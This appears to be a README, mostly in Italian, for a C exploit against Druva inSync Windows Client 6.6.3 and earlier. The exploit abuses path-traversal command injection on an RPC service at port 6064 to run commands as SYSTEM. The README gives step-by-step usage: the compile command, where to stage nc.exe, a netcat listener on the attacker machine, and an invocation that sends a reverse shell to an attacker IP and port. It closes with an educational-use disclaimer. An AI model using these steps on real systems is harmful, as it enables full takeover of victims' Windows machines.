
Escalation dei privilegi locali per Druva
Un exploit basato su C per il Druva inSync Windows Client (v6.6.3 e versioni precedenti). L'applicazione espone un servizio RPC sulla porta 6064 vulnerabile a un'iniezione di comandi tramite path traversal. Ciò consente a un utente locale di eseguire comandi arbitrari come NT AUTHORITY\SYSTEM.
Usa gcc (MinGW) per compilare il codice sorgente:
gcc exploit.c -o exploit.exe -lws2_32
Posiziona una copia di nc.exe in una directory accessibile dall'account SYSTEM (ad es., C:\Windows\Tasks).
Avvia un listener sulla macchina dell'attaccante:
nc -lvnp 4444
Run the exploit on the target Windows machine:
exploit.exe <Attacker_IP> <Attacker_Port> <Path_to_NC>
Example:
exploit.exe 10.10.10.5 4444 C:\Windows\Tasks\nc.exe
Questo strumento è solo a scopo educativo. L'uso non autorizzato su sistemi di cui non si ha il permesso di testare è illegale